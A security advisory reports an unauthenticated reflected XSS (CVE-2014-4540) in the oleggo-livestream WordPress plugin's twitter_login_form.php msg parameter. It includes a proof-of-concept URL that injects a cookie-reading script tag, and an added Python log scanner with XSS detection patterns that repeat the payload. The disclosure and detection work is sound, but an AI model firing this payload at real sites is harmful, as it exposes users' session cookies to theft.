wp-plugin : oleggo-livestream – A3-Cross-Site Scripting (XSS)

Plugin Details

Plugin Name : oleggo-livestream

Affected Version : 0.2.6 (and most probably lower versions, if any)

Vulnerability : A3-Cross-Site Scripting (XSS)

Identified by : Prajal Kulkarni

Technical Details

Minimum Level of Access Required : Unauthenticated

PoC - (Proof of Concept) :
http://localhost/wordpress/wp-content/wp-plugs/oleggolivestream/oleggo-twitter/twitter_login_form.php?msg=msg%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

Vulnerable Parameter : msg
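
As an added detection example (not part of this advisory and not the plugin's code), the script below scans web-server access-log lines for requests that carry script or attribute-breakout markers in the msg parameter of twitter_login_form.php, the reflected parameter above. The log lines, client IPs and the wp-content/plugins install path are constructed for illustration.

```python
# Added example, not the plugin's code: flag reflected-XSS attempts against the
# `msg` parameter of oleggo-twitter/twitter_login_form.php in combined-format logs.
import re
from urllib.parse import parse_qs, unquote, urlsplit

VULN_SCRIPT = "oleggo-twitter/twitter_login_form.php"
# Markers of a breakout from the reflected text/attribute context into markup.
XSS_MARKERS = re.compile(r"<\s*/?\s*script|javascript:|on\w+\s*=|<\s*(svg|img|iframe)", re.I)
# Combined log format (Apache/nginx): ip ident user [ts] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')


def decode_msg(target):
    """Return the decoded `msg` value if the target hits the vulnerable script, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith(VULN_SCRIPT):
        return None
    values = parse_qs(parts.query, keep_blank_values=True).get("msg")
    if not values:
        return None
    decoded = values[0]  # parse_qs already removed one layer of URL encoding
    while unquote(decoded) != decoded:  # peel extra layers (double-encoded payloads)
        decoded = unquote(decoded)
    return decoded


def find_xss_attempts(lines):
    """Return (ip, timestamp, decoded msg) for each request whose msg carries XSS markers."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        msg = decode_msg(m.group("target"))
        if msg is not None and XSS_MARKERS.search(msg):
            hits.append((m.group("ip"), m.group("ts"), msg))
    return hits


# Constructed sample log lines (documentation-range IPs, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [28/May/2014:10:01:02 +0000] "GET /wp-content/plugins/oleggo-livestream/'
    'oleggo-twitter/twitter_login_form.php?msg=msg%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E HTTP/1.1" 200 512',
    '198.51.100.7 - - [28/May/2014:10:02:15 +0000] "GET /wp-content/plugins/oleggo-livestream/'
    'oleggo-twitter/twitter_login_form.php?msg=Login+failed HTTP/1.1" 200 480',
    '192.0.2.9 - - [28/May/2014:10:03:40 +0000] "GET /index.php?s=%3Cscript%3E HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    print(find_xss_attempts(SAMPLE_LOG))  # only the first sample line is reported
```

Only requests to the vulnerable script are inspected, so a script tag in some other parameter (third sample line) is left to other rules; the double-decode loop keeps %25-encoded payloads from slipping past the marker check.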

 

Disclosure Timeline

Vendor Contacted : 2014-01-21

Plugin Status : Closed

Public Disclosure : May 28, 2014

CVE Number : CVE-2014-4540

Plugin Description :

Oleggo LiveStream is a WordPress plugin that integrates video streaming, Twitter and Facebook to improve your streaming events.

Oleggo LiveStream can manage video streaming (from YouTube, Vimeo, Ustream or whatever you want), plus you can add Twitter hashtag search and Facebook live streaming. Using these services you can create a great live-streaming event page.
